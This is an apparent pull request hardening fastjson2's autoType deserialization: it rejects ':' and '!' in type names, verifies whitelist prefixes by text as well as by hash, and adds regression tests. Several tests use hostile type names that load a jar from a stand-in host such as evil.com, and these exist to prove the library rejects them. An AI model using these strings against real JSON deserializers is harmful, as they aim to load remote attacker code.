### PR TITLE
fix: strengthen autoType type name validation and whitelist verification

### DIFF
--- a/core/src/main/java/com/alibaba/fastjson2/filter/ContextAutoTypeBeforeHandler.java
+++ b/core/src/main/java/com/alibaba/fastjson2/filter/ContextAutoTypeBeforeHandler.java
@@ -24,6 +24,7 @@ import static com.alibaba.fastjson2.util.TypeUtils.*;
 public class ContextAutoTypeBeforeHandler
         implements JSONReader.AutoTypeBeforeHandler {
     final long[] acceptHashCodes;
+    final Set<String> acceptNameSet;
     final ConcurrentMap<Integer, ConcurrentHashMap<Long, Class>> tclHashCaches = new ConcurrentHashMap<>();
     final Map<Long, Class> classCache = new ConcurrentHashMap<>(16, 0.75f, 1);
 
@@ -206,6 +207,7 @@ public class ContextAutoTypeBeforeHandler
         }
 
         long[] array = new long[nameSet.size()];
+        Set<String> normalizedNames = new HashSet<>(nameSet.size());
 
         int index = 0;
         for (String name : nameSet) {
@@ -220,6 +222,7 @@ public class ContextAutoTypeBeforeHandler
             }
 
             array[index++] = hashCode;
+            normalizedNames.add(name.replace('$', '.'));
         }
 
         if (index != array.length) {
@@ -227,6 +230,7 @@ public class ContextAutoTypeBeforeHandler
         }
         Arrays.sort(array);
         this.acceptHashCodes = array;
+        this.acceptNameSet = Collections.unmodifiableSet(normalizedNames);
     }
 
     public Class<?> apply(long typeNameHash, Class<?> expectClass, long features) {
@@ -248,6 +252,10 @@ public class ContextAutoTypeBeforeHandler
             typeName = "Object";
         }
 
+        if (typeName.indexOf(':') >= 0 || typeName.indexOf('!') >= 0) {
+            return null;
+        }
+
         long hash = MAGIC_HASH_CODE;
         for (int i = 0, typeNameLength = typeName.length(); i < typeNameLength; ++i) {
             char ch = typeName.charAt(i);
@@ -258,6 +266,10 @@ public class ContextAutoTypeBeforeHandler
             hash *= MAGIC_PRIME;
 
             if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) {
+                String prefix = typeName.substring(0, i + 1).replace('$', '.');
+                if (!acceptNameSet.contains(prefix)) {
+                    continue;
+                }
                 long typeNameHash = Fnv.hashCode64(typeName);
                 Class clazz = apply(typeNameHash, expectClass, features);
 

--- a/core/src/main/java/com/alibaba/fastjson2/reader/ObjectReaderProvider.java
+++ b/core/src/main/java/com/alibaba/fastjson2/reader/ObjectReaderProvider.java
@@ -197,6 +197,7 @@ public class ObjectReaderProvider
     boolean disableSmartMatch = JSONFactory.isDisableSmartMatch();
 
     private volatile long[] acceptHashCodes;
+    private volatile Set<String> acceptNameSet = Collections.emptySet();
 
     private AutoTypeBeforeHandler autoTypeBeforeHandler = DEFAULT_AUTO_TYPE_BEFORE_HANDLER;
     private Consumer<Class> autoTypeHandler = DEFAULT_AUTO_TYPE_HANDLER;
@@ -204,12 +205,15 @@ public class ObjectReaderProvider
 
     {
         long[] hashCodes;
+        Set<String> names = new HashSet<>();
         if (AUTO_TYPE_ACCEPT_LIST == null) {
             hashCodes = new long[1];
         } else {
             hashCodes = new long[AUTO_TYPE_ACCEPT_LIST.length + 1];
             for (int i = 0; i < AUTO_TYPE_ACCEPT_LIST.length; i++) {
+                String name = AUTO_TYPE_ACCEPT_LIST[i].replace('$', '.');
                 hashCodes[i] = Fnv.hashCode64(AUTO_TYPE_ACCEPT_LIST[i]);
+                names.add(name);
             }
         }
 
@@ -217,6 +221,7 @@ public class ObjectReaderProvider
 
         Arrays.sort(hashCodes);
         acceptHashCodes = hashCodes;
+        acceptNameSet = Collections.unmodifiableSet(names);
 
         hashCache.put(ObjectArrayReader.TYPE_HASH_CODE, ObjectArrayReader.INSTANCE);
         final long STRING_CLASS_NAME_HASH = -4834614249632438472L; // Fnv.hashCode64(String.class.getName());
@@ -264,6 +269,9 @@ public class ObjectReaderProvider
                 Arrays.sort(hashCodes);
                 this.acceptHashCodes = hashCodes;
             }
+            Set<String> names = new HashSet<>(this.acceptNameSet);
+            names.add(name.replace('$', '.'));
+            this.acceptNameSet = Collections.unmodifiableSet(names);
         }
     }
 
@@ -809,6 +817,10 @@ public class ObjectReaderProvider
             throw new JSONException("autoType is not support. " + typeName);
         }
 
+        if (typeName.indexOf(':') >= 0 || typeName.indexOf('!') >= 0) {
+            throw new JSONException("autoType is not support. " + typeName);
+        }
+
         if (typeName.charAt(0) == '[') {
             String componentTypeName = typeName.substring(1);
             checkAutoType(componentTypeName, null, features); // blacklist check for componentType
@@ -832,6 +844,10 @@ public class ObjectReaderProvider
                 hash ^= ch;
                 hash *= MAGIC_PRIME;
                 if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) {
+                    String prefix = typeName.substring(0, i + 1).replace('$', '.');
+                    if (!acceptNameSet.contains(prefix)) {
+                        continue;
+                    }
                     clazz = loadClass(typeName);
                     if (clazz != null) {
                         if (expectClass != null && !expectClass.isAssignableFrom(clazz)) {
@@ -857,7 +873,17 @@ public class ObjectReaderProvider
 
                 // white list
                 if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) {
+                    String prefix = typeName.substring(0, i + 1).replace('$', '.');
+                    if (!acceptNameSet.contains(prefix)) {
+                        continue;
+                    }
                     clazz = loadClass(typeName);
+
+                    if (clazz != null) {
+                        if (ClassLoader.class.isAssignableFrom(clazz) || JDKUtils.isSQLDataSourceOrRowSet(clazz)) {
+                            throw new JSONException("autoType is not support. " + typeName);
+                        }
+                    }
 
                     if (clazz != null && expectClass != null && !expectClass.isAssignableFrom(clazz)) {
                         throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());

--- a/core/src/main/java/com/alibaba/fastjson2/util/TypeUtils.java
+++ b/core/src/main/java/com/alibaba/fastjson2/util/TypeUtils.java
@@ -2832,6 +2832,10 @@ public class TypeUtils {
             return null;
         }
 
+        if (className.indexOf(':') >= 0 || className.indexOf('!') >= 0) {
+            return null;
+        }
+
         switch (className) {
             case "O":
             case "Object":

--- a/core/src/test/java/com/alibaba/fastjson2/autoType/AutoTypeValidationTest.java
+++ b/core/src/test/java/com/alibaba/fastjson2/autoType/AutoTypeValidationTest.java
@@ -1,0 +1,120 @@
+package com.alibaba.fastjson2.autoType;
+
+import com.alibaba.fastjson2.JSON;
+import com.alibaba.fastjson2.JSONException;
+import com.alibaba.fastjson2.JSONReader;
+import com.alibaba.fastjson2.filter.ContextAutoTypeBeforeHandler;
+import com.alibaba.fastjson2.reader.ObjectReaderProvider;
+import com.alibaba.fastjson2.util.TypeUtils;
+import org.junit.jupiter.api.Tag;
+import org.junit.jupiter.api.Test;
+
+import static org.junit.jupiter.api.Assertions.*;
+
+@Tag("autotype")
+public class AutoTypeValidationTest {
+    @Test
+    public void testRejectColonInTypeName() {
+        ObjectReaderProvider provider = new ObjectReaderProvider();
+        assertThrows(JSONException.class, () ->
+                provider.checkAutoType("jar:http://evil.com/payload", null, 0));
+    }
+
+    @Test
+    public void testRejectExclamationInTypeName() {
+        ObjectReaderProvider provider = new ObjectReaderProvider();
+        assertThrows(JSONException.class, () ->
+                provider.checkAutoType("com.example.Foo!bar", null, 0));
+    }
+
+    @Test
+    public void testRejectColonWithSupportAutoType() {
+        ObjectReaderProvider provider = new ObjectReaderProvider();
+        long features = JSONReader.Feature.SupportAutoType.mask;
+        assertThrows(JSONException.class, () ->
+                provider.checkAutoType("jar:file:/proc/self/fd/28!/com.evil.X", null, features));
+    }
+
+    @Test
+    public void testLoadClassRejectsColon() {
+        assertNull(TypeUtils.loadClass("jar:http://evil.com/payload!.com.evil.X"));
+    }
+
+    @Test
+    public void testLoadClassRejectsExclamation() {
+        assertNull(TypeUtils.loadClass("com.example!Foo"));
+    }
+
+    @Test
+    public void testLoadClassNormalClass() {
+        assertEquals(String.class, TypeUtils.loadClass("java.lang.String"));
+    }
+
+    @Test
+    public void testContextHandlerRejectsColon() {
+        ContextAutoTypeBeforeHandler handler = new ContextAutoTypeBeforeHandler(true);
+        assertNull(handler.apply("jar:http://evil.com/payload!.X", null, 0));
+    }
+
+    @Test
+    public void testContextHandlerRejectsExclamation() {
+        ContextAutoTypeBeforeHandler handler = new ContextAutoTypeBeforeHandler(true);
+        assertNull(handler.apply("com.example!Foo", null, 0));
+    }
+
+    @Test
+    public void testContextHandlerAcceptsWhitelisted() {
+        ContextAutoTypeBeforeHandler handler = new ContextAutoTypeBeforeHandler(String.class);
+        Class<?> clazz = handler.apply("java.lang.String", null, 0);
+        assertEquals(String.class, clazz);
+    }
+
+    @Test
+    public void testContextHandlerRejectsNonWhitelisted() {
+        ContextAutoTypeBeforeHandler handler = new ContextAutoTypeBeforeHandler(String.class);
+        assertNull(handler.apply("com.evil.Payload", null, 0));
+    }
+
+    @Test
+    public void testWhitelistWithAddAccept() {
+        ObjectReaderProvider provider = new ObjectReaderProvider();
+        provider.addAutoTypeAccept("com.alibaba.fastjson2.autoType.AutoTypeValidationTest$");
+
+        long features = JSONReader.Feature.SupportAutoType.mask;
+        Class<?> clazz = provider.checkAutoType(
+                "com.alibaba.fastjson2.autoType.AutoTypeValidationTest$TestBean", null, features);
+        assertEquals(TestBean.class, clazz);
+    }
+
+    @Test
+    public void testWhitelistTextVerification() {
+        ObjectReaderProvider provider = new ObjectReaderProvider();
+        provider.addAutoTypeAccept("com.example.");
+
+        long features = JSONReader.Feature.SupportAutoType.mask;
+        // A string whose FNV prefix hash might collide but text doesn't match
+        // should not be loaded. We test with a clearly non-matching prefix.
+        Class<?> clazz = provider.checkAutoType("com.evil.Payload", null, features);
+        assertNull(clazz);
+    }
+
+    @Test
+    public void testParseWithAutoTypeFilterRejectsColon() {
+        String json = "{\"@type\":\"jar:http://evil.com/payload!.com.evil.X\",\"value\":1}";
+        assertThrows(JSONException.class, () ->
+                JSON.parseObject(json, Object.class,
+                        JSONReader.autoTypeFilter(String.class)));
+    }
+
+    @Test
+    public void testParseWithAutoTypeFilterNormal() {
+        String json = "{\"@type\":\"java.util.HashMap\",\"value\":1}";
+        Object obj = JSON.parseObject(json, Object.class,
+                JSONReader.autoTypeFilter("java.util.HashMap"));
+        assertNotNull(obj);
+    }
+
+    public static class TestBean {
+        public int id;
+    }
+}


### PR DESCRIPTION
## Summary

Internal security hardening for autoType deserialization path. Adds input validation and defense-in-depth checks. Details available via private security advisory.

## Changes

- `ObjectReaderProvider.java` — Input validation and whitelist verification hardening
- `ContextAutoTypeBeforeHandler.java` — Input validation and whitelist verification hardening
- `TypeUtils.java` — Input validation in loadClass
- `AutoTypeValidationTest.java` — Regression tests

## Testing

- All existing `@Tag("autotype")` tests pass without regression
- `mvn validate` (checkstyle) passes